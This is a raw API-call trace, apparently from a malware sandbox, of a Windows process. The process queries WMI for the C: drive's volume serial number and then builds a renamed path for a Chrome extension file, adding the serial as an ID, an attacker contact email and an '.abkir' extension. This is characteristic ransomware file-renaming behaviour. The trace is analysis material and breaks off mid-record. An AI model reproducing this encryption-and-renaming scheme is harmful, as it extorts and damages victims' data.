WbemDefPath:IWbemPath:GetText (in: This=0x602a300, lFlags=2, puBuffLength=0x949e8f8*=0x0, pszText=0x0 | out: puBuffLength=0x949e8f8*=0x20, pszText=0x0) returned 0x0 [0213.049] WbemDefPath:IWbemPath:GetText (in: This=0x602a300, lFlags=2, puBuffLength=0x949e8f8*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x949e8f8*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0213.049] WbemDefPath:IWbemPath:GetInfo (in: This=0x602a300, uRequestedInfo=0x0, puResponse=0x949e904 | out: puResponse=0x949e904*=0xc19) returned 0x0 [0213.049] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x602a300, puCount=0x949e8fc | out: puCount=0x949e8fc*=0x0) returned 0x0 [0213.049] WbemDefPath:IWbemPath:GetInfo (in: This=0x602a300, uRequestedInfo=0x0, puResponse=0x949e904 | out: puResponse=0x949e904*=0xc19) returned 0x0 [0213.049] WbemDefPath:IWbemPath:GetInfo (in: This=0x602a300, uRequestedInfo=0x0, puResponse=0x949e904 | out: puResponse=0x949e904*=0xc19) returned 0x0 [0213.049] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x602a300, puCount=0x949e87c | out: puCount=0x949e87c*=0x0) returned 0x0 [0213.049] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60109c0, puCount=0x949e868 | out: puCount=0x949e868*=0x2) returned 0x0 [0213.049] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x949e864*=0x0, pszText=0x0 | out: puBuffLength=0x949e864*=0xf, pszText=0x0) returned 0x0 [0213.049] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x949e864*=0xf, pszText="00000000000000" | out: puBuffLength=0x949e864*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0213.050] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949e818 | out: ppv=0x949e818*=0xb51e34) returned 0x0 [0213.050] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x949e810 | out: pAptType=0x949e810*=1) returned 0x0 [0213.050] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x949e814 | out: ppvObject=0x949e814*=0x0) returned 0x80004002 [0213.050] IUnknown:Release (This=0xb51e34) returned 0x1 [0213.051] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949e180 | out: ppv=0x949e180*=0x60271d0) returned 0x0 [0213.051] WbemDefPath:IUnknown:QueryInterface (in: This=0x60271d0, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x949e398 | out: ppvObject=0x949e398*=0x0) returned 0x80004002 [0213.051] WbemDefPath:IClassFactory:CreateInstance (in: This=0x60271d0, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e3ac | out: ppvObject=0x949e3ac*=0x602a290) returned 0x0 [0213.051] WbemDefPath:IUnknown:Release (This=0x60271d0) returned 0x0 [0213.051] WbemDefPath:IUnknown:QueryInterface (in: This=0x602a290, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949dfcc | out: ppvObject=0x949dfcc*=0x602a290) returned 0x0 [0213.051] WbemDefPath:IUnknown:QueryInterface (in: This=0x602a290, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x949df88 | out: ppvObject=0x949df88*=0x0) returned 0x80004002 [0213.051] WbemDefPath:IUnknown:AddRef (This=0x602a290) returned 0x3 [0213.052] WbemDefPath:IUnknown:QueryInterface (in: This=0x602a290, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x949d8e4 | out: ppvObject=0x949d8e4*=0x0) returned 0x80004002 [0213.052] WbemDefPath:IUnknown:QueryInterface (in: This=0x602a290, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x949d894 | out: ppvObject=0x949d894*=0x0) returned 0x80004002 [0213.052] WbemDefPath:IUnknown:QueryInterface (in: This=0x602a290, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949d8a0 | out: ppvObject=0x949d8a0*=0x66ce558) returned 0x0 [0213.052] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x66ce558, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x949d8a8 | out: pCid=0x949d8a8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0213.052] WbemDefPath:IUnknown:Release (This=0x66ce558) returned 0x3 [0213.052] CoGetContextToken (in: pToken=0x949d900 | out: pToken=0x949d900) returned 0x0 [0213.052] CoGetContextToken (in: pToken=0x949dd08 | out: pToken=0x949dd08) returned 0x0 [0213.052] WbemDefPath:IUnknown:QueryInterface (in: This=0x602a290, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949dd98 | out: ppvObject=0x949dd98*=0x0) returned 0x80004002 [0213.052] WbemDefPath:IUnknown:Release (This=0x602a290) returned 0x2 [0213.052] WbemDefPath:IUnknown:Release (This=0x602a290) returned 0x1 [0213.052] CoGetContextToken (in: pToken=0x949e690 | out: pToken=0x949e690) returned 0x0 [0213.052] CoGetContextToken (in: pToken=0x949e5f0 | out: pToken=0x949e5f0) returned 0x0 [0213.052] WbemDefPath:IUnknown:QueryInterface (in: This=0x602a290, riid=0x949e6c0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x949e6bc | out: ppvObject=0x949e6bc*=0x602a290) returned 0x0 [0213.052] WbemDefPath:IUnknown:AddRef (This=0x602a290) returned 0x3 [0213.052] WbemDefPath:IUnknown:Release (This=0x602a290) returned 0x2 [0213.052] WbemDefPath:IWbemPath:SetText (This=0x602a290, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0213.052] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x602a290, puCount=0x949e840 | out: puCount=0x949e840*=0x2) returned 0x0 [0213.052] WbemDefPath:IWbemPath:GetText (in: This=0x602a290, lFlags=4, puBuffLength=0x949e83c*=0x0, pszText=0x0 | out: puBuffLength=0x949e83c*=0xf, pszText=0x0) returned 0x0 [0213.053] WbemDefPath:IWbemPath:GetText (in: This=0x602a290, lFlags=4, puBuffLength=0x949e83c*=0xf, pszText="00000000000000" | out: puBuffLength=0x949e83c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0213.053] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949e840 | out: ppv=0x949e840*=0xb51e34) returned 0x0 [0213.053] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x949e838 | out: pAptType=0x949e838*=1) returned 0x0 [0213.053] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x949e83c | out: ppvObject=0x949e83c*=0x0) returned 0x80004002 [0213.053] IUnknown:Release (This=0xb51e34) returned 0x1 [0213.054] CoGetClassObject (in: rclsid=0xb59574*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949e460 | out: ppv=0x949e460*=0x6024980) returned 0x0 [0213.054] WbemLocator:IUnknown:QueryInterface (in: This=0x6024980, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x949e678 | out: ppvObject=0x949e678*=0x0) returned 0x80004002 [0213.054] WbemLocator:IClassFactory:CreateInstance (in: This=0x6024980, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e68c | out: ppvObject=0x949e68c*=0x6027480) returned 0x0 [0213.054] WbemLocator:IUnknown:Release (This=0x6024980) returned 0x0 [0213.054] WbemLocator:IUnknown:QueryInterface (in: This=0x6027480, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e2ac | out: ppvObject=0x949e2ac*=0x6027480) returned 0x0 [0213.054] WbemLocator:IUnknown:QueryInterface (in: This=0x6027480, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x949e268 | out: ppvObject=0x949e268*=0x0) returned 0x80004002 [0213.054] WbemLocator:IUnknown:AddRef (This=0x6027480) returned 0x3 [0213.054] WbemLocator:IUnknown:QueryInterface (in: This=0x6027480, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x949dbc4 | out: ppvObject=0x949dbc4*=0x0) returned 0x80004002 [0213.054] WbemLocator:IUnknown:QueryInterface (in: This=0x6027480, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x949db74 | out: ppvObject=0x949db74*=0x0) returned 0x80004002 [0213.054] WbemLocator:IUnknown:QueryInterface (in: This=0x6027480, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949db80 | out: ppvObject=0x949db80*=0x0) returned 0x80004002 [0213.054] CoGetContextToken (in: pToken=0x949dbe0 | out: pToken=0x949dbe0) returned 0x0 [0213.055] CoGetContextToken (in: pToken=0x949dfe8 | out: pToken=0x949dfe8) returned 0x0 [0213.055] WbemLocator:IUnknown:QueryInterface (in: This=0x6027480, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e078 | out: ppvObject=0x949e078*=0x0) returned 0x80004002 [0213.055] WbemLocator:IUnknown:Release (This=0x6027480) returned 0x2 [0213.055] WbemLocator:IUnknown:Release (This=0x6027480) returned 0x1 [0213.055] CoGetContextToken (in: pToken=0x949e658 | out: pToken=0x949e658) returned 0x0 [0213.055] CoGetContextToken (in: pToken=0x949e5b8 | out: pToken=0x949e5b8) returned 0x0 [0213.055] WbemLocator:IUnknown:QueryInterface (in: This=0x6027480, riid=0x949e688*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x949e684 | out: ppvObject=0x949e684*=0x6027480) returned 0x0 [0213.055] WbemLocator:IUnknown:AddRef (This=0x6027480) returned 0x3 [0213.055] WbemLocator:IUnknown:Release (This=0x6027480) returned 0x2 [0213.055] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x602a290, puCount=0x949e81c | out: puCount=0x949e81c*=0x2) returned 0x0 [0213.055] WbemDefPath:IWbemPath:GetText (in: This=0x602a290, lFlags=8, puBuffLength=0x949e818*=0x0, pszText=0x0 | out: puBuffLength=0x949e818*=0xf, pszText=0x0) returned 0x0 [0213.055] WbemDefPath:IWbemPath:GetText (in: This=0x602a290, lFlags=8, puBuffLength=0x949e818*=0xf, pszText="00000000000000" | out: puBuffLength=0x949e818*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0213.055] CoCreateInstance (in: rclsid=0x749b1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x749b12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x949e6f4 | out: ppv=0x949e6f4*=0x60274e0) returned 0x0 [0213.055] WbemLocator:IWbemLocator:ConnectServer (in: This=0x60274e0, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x949e788 | out: ppNamespace=0x949e788*=0x60337ec) returned 0x0 [0213.500] WbemLocator:IUnknown:QueryInterface (in: This=0x60337ec, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e624 | out: ppvObject=0x949e624*=0xb5bf44) returned 0x0 [0213.500] WbemLocator:IClientSecurity:QueryBlanket (in: This=0xb5bf44, pProxy=0x60337ec, pAuthnSvc=0x949e674, pAuthzSvc=0x949e670, pServerPrincName=0x949e668, pAuthnLevel=0x949e66c, pImpLevel=0x949e65c, pAuthInfo=0x949e660, pCapabilites=0x949e664 | out: pAuthnSvc=0x949e674*=0xa, pAuthzSvc=0x949e670*=0x0, pServerPrincName=0x949e668, pAuthnLevel=0x949e66c*=0x6, pImpLevel=0x949e65c*=0x2, pAuthInfo=0x949e660, pCapabilites=0x949e664*=0x1) returned 0x0 [0213.500] WbemLocator:IUnknown:Release (This=0xb5bf44) returned 0x1 [0213.500] WbemLocator:IUnknown:QueryInterface (in: This=0x60337ec, riid=0x749b10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e618 | out: ppvObject=0x949e618*=0xb5bf64) returned 0x0 [0213.500] WbemLocator:IUnknown:QueryInterface (in: This=0x60337ec, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e614 | out: ppvObject=0x949e614*=0xb5bf44) returned 0x0 [0213.501] WbemLocator:IClientSecurity:SetBlanket (This=0xb5bf44, pProxy=0x60337ec, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0213.501] WbemLocator:IUnknown:Release (This=0xb5bf44) returned 0x2 [0213.501] WbemLocator:IUnknown:Release (This=0xb5bf64) returned 0x1 [0213.501] CoTaskMemFree (pv=0xbd4a38) [0213.501] WbemLocator:IUnknown:Release (This=0x60274e0) returned 0x0 [0213.501] WbemLocator:IUnknown:QueryInterface (in: This=0x60337ec, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e214 | out: ppvObject=0x949e214*=0xb5bf64) returned 0x0 [0213.501] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bf64, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x949e1d0 | out: ppvObject=0x949e1d0*=0x0) returned 0x80004002 [0213.502] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bf64, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x949dfec | out: ppvObject=0x949dfec*=0x0) returned 0x80004002 [0213.502] WbemLocator:IUnknown:AddRef (This=0xb5bf64) returned 0x3 [0213.502] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bf64, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x949db2c | out: ppvObject=0x949db2c*=0x0) returned 0x80004002 [0213.503] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bf64, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x949dadc | out: ppvObject=0x949dadc*=0x0) returned 0x80004002 [0213.503] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bf64, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949dae8 | out: ppvObject=0x949dae8*=0xb5bec4) returned 0x0 [0213.503] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0xb5bec4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x949daf0 | out: pCid=0x949daf0*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0213.503] WbemLocator:IUnknown:Release (This=0xb5bec4) returned 0x3 [0213.503] CoGetContextToken (in: pToken=0x949db48 | out: pToken=0x949db48) returned 0x0 [0213.503] CoGetContextToken (in: pToken=0x949df50 | out: pToken=0x949df50) returned 0x0 [0213.503] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bf64, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949dfe0 | out: ppvObject=0x949dfe0*=0xb5bf4c) returned 0x0 [0213.504] WbemLocator:IRpcOptions:Query (in: This=0xb5bf4c, pPrx=0xb5bf64, dwProperty=2, pdwValue=0x949e008 | out: pdwValue=0x949e008) returned 0x80004002 [0213.504] WbemLocator:IUnknown:Release (This=0xb5bf4c) returned 0x3 [0213.504] WbemLocator:IUnknown:Release (This=0xb5bf64) returned 0x2 [0213.504] CoGetContextToken (in: pToken=0x949e528 | out: pToken=0x949e528) returned 0x0 [0213.504] CoGetContextToken (in: pToken=0x949e488 | out: pToken=0x949e488) returned 0x0 [0213.504] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bf64, riid=0x949e558*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x949e554 | out: ppvObject=0x949e554*=0x60337ec) returned 0x0 [0213.504] WbemLocator:IUnknown:AddRef (This=0x60337ec) returned 0x4 [0213.504] WbemLocator:IUnknown:Release (This=0x60337ec) returned 0x3 [0213.504] WbemLocator:IUnknown:Release (This=0x60337ec) returned 0x2 [0213.504] SysStringLen (param_1=0x0) returned 0x0 [0213.504] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x602a300, puCount=0x949e8ec | out: puCount=0x949e8ec*=0x0) returned 0x0 [0213.504] WbemDefPath:IWbemPath:GetText (in: This=0x602a300, lFlags=2, puBuffLength=0x949e8e8*=0x0, pszText=0x0 | out: puBuffLength=0x949e8e8*=0x20, pszText=0x0) returned 0x0 [0213.504] WbemDefPath:IWbemPath:GetText (in: This=0x602a300, lFlags=2, puBuffLength=0x949e8e8*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x949e8e8*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0213.504] CoGetContextToken (in: pToken=0x949e558 | out: pToken=0x949e558) returned 0x0 [0213.504] WbemLocator:IUnknown:AddRef (This=0xb5bf64) returned 0x3 [0213.504] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bf64, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e3ec | out: ppvObject=0x949e3ec*=0xb5bf64) returned 0x0 [0213.504] WbemLocator:IUnknown:Release (This=0xb5bf64) returned 0x3 [0213.504] WbemLocator:IUnknown:Release (This=0xb5bf64) returned 0x2 [0213.504] WbemDefPath:IWbemPath:GetText (in: This=0x602a300, lFlags=2, puBuffLength=0x949e8f0*=0x0, pszText=0x0 | out: puBuffLength=0x949e8f0*=0x20, pszText=0x0) returned 0x0 [0213.505] WbemDefPath:IWbemPath:GetText (in: This=0x602a300, lFlags=2, puBuffLength=0x949e8f0*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x949e8f0*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0213.505] IWbemServices:GetObject (in: This=0x60337ec, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x949e8a4*=0x0, ppCallResult=0x0 | out: ppObject=0x949e8a4*=0x6028b10, ppCallResult=0x0) returned 0x0 [0213.717] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x602a290, puCount=0x949e8a4 | out: puCount=0x949e8a4*=0x2) returned 0x0 [0213.717] WbemDefPath:IWbemPath:GetText (in: This=0x602a290, lFlags=4, puBuffLength=0x949e8a0*=0x0, pszText=0x0 | out: puBuffLength=0x949e8a0*=0xf, pszText=0x0) returned 0x0 [0213.717] WbemDefPath:IWbemPath:GetText (in: This=0x602a290, lFlags=4, puBuffLength=0x949e8a0*=0xf, pszText="00000000000000" | out: puBuffLength=0x949e8a0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0213.717] IWbemClassObject:Get (in: This=0x6028b10, wszName="VolumeSerialNumber", lFlags=0, pVal=0x949e8a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3630d54*=0, plFlavor=0x3630d58*=0 | out: pVal=0x949e8a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x3630d54*=8, plFlavor=0x3630d58*=0) returned 0x0 [0213.717] SysStringByteLen (bstr="9C354B42") returned 0x10 [0213.717] SysStringByteLen (bstr="9C354B42") returned 0x10 [0213.717] IWbemClassObject:Get (in: This=0x6028b10, wszName="VolumeSerialNumber", lFlags=0, pVal=0x949e8a8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3630d54*=8, plFlavor=0x3630d58*=0 | out: pVal=0x949e8a8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x3630d54*=8, plFlavor=0x3630d58*=0) returned 0x0 [0213.717] SysStringByteLen (bstr="9C354B42") returned 0x10 [0213.717] SysStringByteLen (bstr="9C354B42") returned 0x10 [0213.717] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\messages.json", nBufferLength=0x105, lpBuffer=0x949e4a8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\messages.json", lpFilePart=0x0) returned 0x97 [0213.717] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\messages.json.id-9C354B42.[pewpew@TuTa.io].abkir", nBufferLength=0x105, lpBuffer=0x949e4a8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\messages.json.id-9C354B42.[pewpew@TuTa.io].abkir", lpFilePart=0x0) returned 0xba [0213.717] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949e908) returned 1 [0213.717] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\messages.json"), fInfoLevelId=0x0, lpFileInformation=0x949e984 | out: lpFileInformation=0x949e984*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x857bb530, 